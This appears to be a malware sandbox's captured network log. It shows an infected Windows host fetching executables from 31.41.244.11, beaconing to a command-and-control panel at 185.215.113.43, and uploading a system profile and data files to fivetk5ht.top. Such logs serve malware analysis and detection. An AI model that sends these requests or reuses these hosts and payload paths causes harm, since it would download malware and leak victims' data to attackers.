                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:16:32 GMTContent-Type: application/octet-streamContent-Length: 2778624Last-Modified: Fri, 20 Dec 2024 23:14:17 GMTConnection: keep-aliveETag: "6765fa49-2a6600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 2d 7c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6b 67 78 61 7a 78 6e 74 00 e0 29 00 00 a0 00 00 00 d6 29 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 64 64 7a 65 69 75 77 00 20 00 00 00 80 2a 00 00 06 00 00 00 3e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 44 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:16:37 GMTContent-Type: application/octet-streamContent-Length: 2918912Last-Modified: Fri, 20 Dec 2024 23:16:13 GMTConnection: keep-aliveETag: "6765fabd-2c8a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 c0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4f 00 00 04 00 00 b5 c9 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6e 64 73 64 65 6e 6d 79 00 f0 2a 00 00 c0 24 00 00 e6 2a 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 78 6b 64 73 74 64 68 00 10 00 00 00 b0 4f 00 00 06 00 00 00 62 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4f 00 00 22 00 00 00 68 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                          Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018967001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018968001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/Krokodyl02/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018969001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018970001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018971001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/loadman/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 442226Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 34 30 30 39 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018972001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/wicked/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851?argument=McrSMDEQlisW3cFq1734740102 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 37 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018973001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Thu, 19 Dec 2024 14:25:14 GMTIf-None-Match: "67642cca-5600"
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 31 38 39 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1018974001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5ht.topAccept: */*Content-Length: 462Content-Type: multipart/form-data; boundary=------------------------o9yPChBXfLqxO7aY1wxJGrData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6f 39 79 50 43 68 42 58 66 4c 71 78 4f 37 61 59 31 77 78 4a 47 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 75 66 6f 70 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 62 35 90 ba dc 99 76 79 75 b6 98 15 5b 1b 91 d9 12 07 d1 e2 6d c3 55 be 93 b8 8a db 17 db 4a 11 a3 39 99 21 fd 48 9c 4e b9 36 e1 64 c8 04 36 60 95 a1 8e 4e e4 ad f1 38 28 4f ff a2 bb 96 9d 24 1f 38 8e 6b 98 4a 95 ec 47 45 04 a0 e0 35 b3 92 b3 c5 67 52 e5 aa 0d 79 85 8d 5e a7 c7 28 29 b3 40 09 2f 5a 73 ab 93 99 e7 fa 4d a8 bf 2e 59 ce e2 8c f8 1a 2c 80 4c 20 49 c6 65 17 1f ef 1e 3f 8c f7 c6 58 06 12 92 2b 74 9c 00 c6 da 8d 3d 7e 42 54 2c 94 e6 a1 f1 3b 1f e1 cd 2d 6b 10 dd 82 ba e8 6f e8 45 e3 f9 83 6d 68 43 54 fa 75 f1 a9 c4 b1 99 0a 9b 59 a9 fd 0a 3d 5a c2 e8 4a 54 cd 39 42 45 70 0a 53 4d 66 de 39 18 e6 16 f9 a0 36 a8 9c 51 e2 9e 77 54 0e 92 b8 3d 1a 22 4a 69 84 fa e8 c3 4f b1 dd 86 23 02 0d 66 0b 87 9e d4 78 9b d7 ff f6 24 fe 68 ab 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6f 39 79 50 43 68 42 58 66 4c 71 78 4f 37 61 59 31 77 78 4a 47 72 2d 2d 0d 0a Data Ascii: --------------------------o9yPChBXfLqxO7aY1wxJGrContent-Disposition: form-data; name="file"; filename="Qufopu.bin"Content-Type: application/octet-streamb5vyu[mUJ9!HN6d6`N8(O$8kJGE5gRy^()@/ZsM.Y,L Ie?X+t=~BT,;-koEmhCTuY=ZJT9BEpSMf96QwT="JiO#fx$h--------------------------o9yPChBXfLqxO7aY1wxJGr--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018975001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5ht.topAccept: */*Content-Length: 62345Content-Type: multipart/form-data; boundary=------------------------qSjdJNZhr4FMeoVpfXnY7HData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 71 53 6a 64 4a 4e 5a 68 72 34 46 4d 65 6f 56 70 66 58 6e 59 37 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 75 66 6f 62 6f 6e 6f 64 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 53 bc 45 64 57 90 3d 07 c6 41 11 bc d5 ac 3f c8 27 51 66 e2 53 b0 29 2d 01 aa 38 27 1b 10 87 82 ab bf 1b 19 bf 22 85 19 97 24 d3 82 a6 4a 25 c3 da 9f 69 0c 1e b2 72 07 7c 7b 2f bd d2 f0 68 34 65 5f 74 92 c6 bc 15 51 72 a0 17 f5 c4 35 7a 65 6f f4 cb 9d 6d 85 79 52 cd c4 92 27 8a 99 72 34 cb 99 6b 24 00 14 b5 10 76 02 fe c0 68 c8 08 fb 66 d8 33 a0 39 c9 5d fa b3 06 4e c8 c1 86 cd df 27 24 01 ec 5d 43 40 28 70 98 47 9f 8c cd 8a 0b c9 95 f9 60 82 bf a8 21 ff be 9f d9 35 ac 34 2b 09 43 51 c5 23 11 45 01 a0 9d 37 ad 8a 61 0e b8 7b 33 ac 43 10 6a 2c 0a 0c f9 c3 ad e7 cb f4 8e f8 dd d3 dd 8d de af dc 59 f9 19 f6 75 38 1b c2 82 7f 84 c5 6d fd 37 6f 6a 46 76 23 2c 46 cb 2e a1 0d 7e 17 43 80 0a d9 56 69 f2 b4 95 45 d8 1e 3d 3d 59 b0 eb c7 b1 43 11 45 83 72 83 71 ff 89 1b 70 55 7e ae ee 97 38 b7 e0 37 d5 99 88 ad 04 02 a4 3b 83 e5 a1 3a 6b e8 ba 85 73 a7 3c a4 9e 66 cc 0d bc 98 61 b7 34 75 f8 52 d2 a0 10 61 34 0f 9e 55 91 b8 50 d6 86 ee dd 8e 9e 97 49 a7 dd b5 27 1c 7f f5 85 42 8b 2d de 75 e5 dc 4f a9 da 36 dd cd 4d 4b 8e cd f1 5d 19 46 fa 46 40 ac 68 97 83 51 f5 bf 1d ff 73 70 4e 67 2b b8 d0 44 c1 c4 0a 03 e2 34 ad a8 83 af 48 ea 57 a8 17 37 49 c7 d1 1b 18 fb 97 e4 7c 77 91 dc 7c 23 90 1a b6 69 57 17 72 b2 cb 00 9a 7b 7c e7 cb 53 6f bd 33 e3 6d 48 77 e8 0a a0 e4 ec 40 18 0e f5 3d 2b 67 56 43 64 8f 69 32 f2 37 96 3f fe 9f c1 ca 31 3b a3 04 d9 86 63 eb 05 61 fa 05 c5 77 e4 64 19 46 6a fb 6d 9e 15 92 2b 98 fc 6d f9 1f ee d2 ac c9 e2 eb fd 05 32 65 f0 3e d2 28 dd 1a 5e 47 34 16 81 79 bc d2 6a c2 85 fb aa 11 9a 50 b2 ca 48 80 13 78 5b 1a 3a cf a2 30 12 a4 ee 00 c4 e3 0d 9d f6 e3 46 95 5a e3 77 63 95 b0 6f 17 1c ca c0 a1 4c 03 9b a2 79 5b 42 dd d9 9b 9a 53 f8 5e a6 b4 43 f8 ce e6 86 8d 60 e1 6e 4e a1 84 91 6d f6 e2 0b b3 23 f1 fd 08 47 d1 e4 36 a8 8c 20 a2 90 42 c9 b7 4b 20 dc d7 d2 9f eb 6c db 3b 7a aa 1c e7 51 0a dd 53 35 5c 60 f7 ae 55 4c 77 aa e0 7c 1f 27 3d 9a 03 53 c3 eb 4a 26 3e 6c 31 37 ce dc e3 10 84 07 77 55 41 a0 e5 bd c5 44 b6 48 f4 19 84 a8 59 f5 89 a1 62 e6 01 aa 7f 81 0a 31 d5 ef 05 91 e3 5a 43 7d d8 db 1d f9 d9 b4 15 cf 2c c1 0e 6f 2e e4 ac a6 28 fe 9b 0a 73 21 82 d7 80 14 50 0f be fb 60 b6 e6 d5 36 3b 2c ce cf 1d e0 d0 49 e4 4e 1a 12 c7 e9 43 ef 21 3a b6 c2 f3 98 fa 38 d5 65 46 10 4b 82 5d ab 3e 31 45 22 67 5c 04 9e eb 46 04 7e 3d 6f 7b 92 7f d4 d5 c8 1a 85 59 cc b7 f4 81 8b de 35
                          Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 39 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1018976001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5ht.topAccept: */*Content-Length: 29090Content-Type: multipart/form-data; boundary=------------------------RK944WB9e1sdV0EWqNmAHlData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 52 4b 39 34 34 57 42 39 65 31 73 64 56 30 45 57 71 4e 6d 41 48 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 65 64 75 70 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 f4 bd cb a0 24 43 2d e1 bf 7f 88 18 f0 5a a8 45 ce b6 2f 4a 2f 82 6e ce 69 e6 ae 05 03 d1 47 5e d4 a9 dc 44 01 b1 0d fe 6e 1c a1 4f a3 48 76 39 b7 a2 8d ca 3d 96 a3 63 e2 3a db 09 fd e6 8c e0 63 5d 6f 7e 96 8c d2 f6 a1 b9 e5 7e b4 05 eb fb f8 99 2b 2c 06 e7 43 cc 91 c9 56 c2 b1 af 56 c9 78 01 44 b3 26 7a 4f 24 d1 37 c6 e3 3f 6c 1b 15 18 56 82 56 27 62 bb dd c1 c4 50 7b e7 29 6f cc 4e e6 31 d3 5c f1 88 79 2b 9a 69 6a eb e5 50 cb 01 c3 01 e5 2d c3 6c 6f 0a 62 c2 7d cb ff 6e 9a eb 42 61 93 27 da b3 7b 72 a2 3b 2b 25 11 50 30 06 98 b8 cb 3c 64 29 7d f9 0c 1e d4 ea 66 e1 8a d0 87 c6 a2 66 c0 22 b0 4c 98 cb 2a ae b2 47 75 b9 77 58 6c b2 d4 42 9a 4c 36 7e af af 4d 00 85 f8 68 48 40 55 53 81 19 b9 14 c6 aa bd 41 df 35 19 d2 ce ec 1f c8 1c c7 ab 36 16 f8 24 89 50 b6 9d 44 ed 10 90 66 f7 02 76 3c 5d a4 21 9f 25 8a ab 73 cc a6 16 a8 2b d0 71 bc 32 5c 00 d5 1d 15 18 a7 17 d2 96 1f 4e a0 b1 b1 57 d5 57 f7 3a 8e 3d 19 0f 5a c6 b4 be 25 40 07 c5 2b 8b fd 19 64 0e 94 8e d6 2d f6 8a fb e5 b7 da 67 94 f8 1d d8 36 